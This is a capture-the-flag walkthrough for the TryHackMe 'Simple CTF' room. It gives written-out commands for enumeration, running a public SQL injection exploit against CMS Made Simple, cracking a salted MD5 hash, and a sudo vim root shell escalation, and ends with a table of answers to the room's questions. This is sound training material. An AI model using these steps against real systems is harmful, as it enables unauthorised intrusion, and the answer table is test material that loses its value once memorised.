Papadope Course

Simple CTF - TryHackMe Walkthrough


A beginner-friendly boot2root machine covering enumeration, web exploitation, password cracking, and privilege escalation.

Room URL: https://tryhackme.com/room/easyctf

Difficulty: Easy


🛠️ Tools & Techniques Used

  • Nmap - Port scanning
  • Gobuster - Directory enumeration
  • FTP - Anonymous login
  • Searchsploit - Exploit database search
  • Hashcat - Password cracking
  • SSH - Remote access
  • GTFOBins - Privilege escalation

🔎 Step-by-Step Walkthrough

1. Enumeration

Nmap Scan

Start with a comprehensive port scan:

nmap -sC -sV -oN nmap_initial.txt <TARGET_IP>

Findings:

Port | Service | Notes
-----|---------|------------------------
21   | FTP     | Anonymous login allowed
80   | HTTP    | Web server
2222 | SSH     | Non-standard SSH port

FTP Access

Connect to FTP with anonymous login:

ftp <TARGET_IP>
# Username: anonymous
# Password: (leave blank or enter anything)

Found: A file named ForMitch.txt containing a password hint.

Web Directory Enumeration

Use Gobuster to find hidden directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Found: /simple — A web application running CMS Made Simple


2. Vulnerability Discovery

  1. Navigate to /simple and identify the CMS version (e.g., 2.2.8)
  2. Search for known vulnerabilities:
searchsploit "CMS Made Simple 2.2.8"

Found: CVE-2019-9053 — SQL Injection vulnerability (ExploitDB ID: 46635)


3. Exploitation

Download and Run the Exploit

# Download the exploit
searchsploit -m 46635

# Install required dependency (Python2)
sudo pip2 install termcolor

# Run the exploit
python2 46635.py -u http://<TARGET_IP>/simple

Result: Retrieved credentials:

  • Username: mitch
  • Hash: (MD5 hash with salt)

4. Password Cracking

Crack the retrieved hash using Hashcat:

hashcat -m 20 hash.txt /usr/share/wordlists/rockyou.txt

💡 Hash mode -m 20 is salted MD5 computed as md5($salt.$pass); each line of hash.txt must be in the format hash:salt

Cracked password: secret
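Before launching a long hashcat run it is worth confirming that -m 20 is really the right mode for the retrieved hash:salt line. The checker below is an added example, not part of the original walkthrough; it tests a candidate password against the two salted-MD5 orderings hashcat distinguishes as -m 20 (md5($salt.$pass)) and -m 10 (md5($pass.$salt)). The sample line is constructed from the RFC 1321 test vector md5("abc") rather than the room's real hash.

```python
import hashlib

# The two salted-MD5 orderings compared here (assumption: only these two
# candidates are tested; hashcat has further salted-MD5 variants).
MODES = {
    20: lambda password, salt: salt + password,  # -m 20: md5($salt.$pass)
    10: lambda password, salt: password + salt,  # -m 10: md5($pass.$salt)
}


def parse_hash_line(line):
    """Split a hashcat-style 'hash:salt' line into (digest, salt)."""
    digest, sep, salt = line.strip().partition(":")
    if not sep or len(digest) != 32:
        raise ValueError(f"not a hash:salt line: {line!r}")
    return digest.lower(), salt


def matching_mode(line, candidate):
    """Return the hashcat mode (20 or 10) under which `candidate` reproduces
    the digest in `line`, or None if neither ordering matches."""
    digest, salt = parse_hash_line(line)
    for mode, build in MODES.items():
        data = build(candidate, salt).encode()
        if hashlib.md5(data).hexdigest() == digest:
            return mode
    return None


def check_wordlist(line, words):
    """Try each word in turn; return (word, mode) for the first hit, else None."""
    for word in words:
        mode = matching_mode(line, word)
        if mode is not None:
            return word, mode
    return None


if __name__ == "__main__":
    # Constructed sample: salt 'ab' + password 'c' -> md5('abc') under -m 20.
    sample = "900150983cd24fb0d6963f7d28e17f72:ab"
    print(check_wordlist(sample, ["password", "c", "secret"]))  # ('c', 20)
```

If the checker reports mode 10 instead of 20, the hash was built with the salt appended, and the hashcat command above would never crack it however good the wordlist is.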


5. Gaining Access

SSH into the machine with the cracked credentials:

ssh mitch@<TARGET_IP> -p 2222

🚩 User Flag: Found in user.txt in mitch's home directory.


6. Privilege Escalation

Check Sudo Permissions

sudo -l

Finding: User mitch can run /usr/bin/vim as root without a password.

Exploit vim for Root Shell

Using the GTFOBins technique for vim:

sudo /usr/bin/vim

Inside vim, spawn a root shell:

:!/bin/bash

🚩 Root Flag: Found in /root/root.txt


📝 Answers to Room Questions

Question                                                        | Answer
----------------------------------------------------------------|--------------------
How many services are running under port 1000?                  | 2
What is running on the higher port?                             | SSH
What's the CVE you're using against the application?            | CVE-2019-9053
To what kind of vulnerability is the application vulnerable?    | SQLi
What's the password?                                            | secret
Where can you login with the details obtained?                  | SSH
What's the user flag?                                           | (found in user.txt)
Is there any other user in the home directory?                  | sunbath
What can you leverage to spawn a privileged shell?              | vim
What's the root flag?                                           | (found in root.txt)

📌 Key Takeaways

  • Always check FTP access — Anonymous login can leak useful information
  • Directory enumeration often reveals web app entry points
  • Version identification is crucial for finding public exploits
  • GTFOBins is essential for privilege escalation via sudo misconfigurations
  • Non-standard ports (like SSH on 2222) are common in CTFs
